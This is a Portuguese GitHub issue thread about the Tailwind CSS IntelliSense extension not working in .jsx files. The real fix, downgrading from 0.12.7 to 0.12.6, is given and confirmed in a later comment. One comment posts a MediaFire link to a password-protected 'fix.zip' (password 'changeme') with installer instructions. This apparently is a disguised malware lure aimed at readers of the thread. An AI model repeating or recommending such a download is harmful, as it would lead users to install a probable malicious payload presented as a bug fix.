### ISSUE TITLE
Não consigo utilizar a extensão em arquivos .jsx do meu projeto

### ISSUE THREAD

**Issue by augustoSamu** [tailwindlabs/tailwindcss-intellisense#1041]
Type: <b>Bug</b>

Já tentei desabilitar extenção, mudar para pré lançamento, desinstalei e instalei de novo o Visual Studio Code, deixei apenas ela como extensão para ver se a havia conflito, deixei zerado o settings.json e ainda sim a extensão não funciona na minha maquina. Como resolver? 

Extension version: 0.12.7
VS Code version: Code 1.92.2 (fee1edb8d6d72a0ddff41e5f71a671c23ed924b9, 2024-08-14T17:29:30.058Z)
OS version: Windows_NT x64 10.0.22631
Modes:

<details>
<summary>System Info</summary>

|Item|Value|
|---|---|
|CPUs|12th Gen Intel(R) Core(TM) i5-1235U (12 x 2496)|
|GPU Status|2d_canvas: enabled<br>canvas_oop_rasterization: enabled_on<br>direct_rendering_display_compositor: disabled_off_ok<br>gpu_compositing: enabled<br>multiple_raster_threads: enabled_on<br>opengl: enabled_on<br>rasterization: enabled<br>raw_draw: disabled_off_ok<br>skia_graphite: disabled_off<br>video_decode: enabled<br>video_encode: enabled<br>vulkan: disabled_off<br>webgl: enabled<br>webgl2: enabled<br>webgpu: enabled<br>webnn: disabled_off|
|Load (avg)|undefined|
|Memory (System)|7.69GB (0.91GB free)|
|Process Argv|--crash-reporter-id 3abda85c-44ce-42f5-bbbd-8066b792f7ac|
|Screen Reader|no|
|VM|0%|
</details><details>
<summary>A/B Experiments</summary>

```
vsliv368:30146709
vspor879:30202332
vspor708:30202333
vspor363:30204092
vswsl492cf:30256860
vscod805:30301674
binariesv615:30325510
vsaa593:30376534
py29gd2263:31024239
c4g48928:30535728
azure-dev_surveyone:30548225
962ge761:30959799
pythongtdpath:30769146
pythonnoceb:30805159
asynctok:30898717
pythonregdiag2:30936856
pythonmypyd1:30879173
2e7ec940:31000449
pythontbext0:30879054
dsvsc016:30899300
dsvsc017:30899301
dsvsc018:30899302
cppperfnew:31000557
dsvsc020:30976470
pythonait:31006305
dsvsc021:30996838
9c06g630:31013171
pythoncenvpt:31062603
a69g1124:31058053
dvdeprecation:31068756
dwnewjupyter:31046869
impr_priority:31102340
nativerepl2:31104044
refactort:31108082
pythonrstrctxt:31112756
flightc:31119335
wkspc-onlycs-t:31111718
wkspc-ranged-c:31125598
ei213698:31121563
aajjf12562:31125793

```

</details>

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by viieiiragui** [comment]
Oi @augustoSamu, acredito que seja essa versão 0.12.7. Volta uma versão e experimenta de novo, comigo aconteceu a mesma coisa.

Se não souber como trocar a versão, vai em "Extensions", procure pela extensão "Tailwind CSS IntelliSense", se ela já tiver instalada clique em "Uninstall" e clique novamente em "Install Specific Version..." e selecione uma anterior a "0.12.7", por exemplo, a versão "0.12.6".

![image](https://github.com/user-attachments/assets/1c90b49b-8aa6-4da4-837e-ed8b161d6dfa)
![image](https://github.com/user-attachments/assets/a664f593-cda4-4181-8213-56881da2dd79)

**Comment by augustoSamu** [comment]
Obrigado pela ajuda @viieiiragui, voltei uma versão e ta funcionando direitinho!
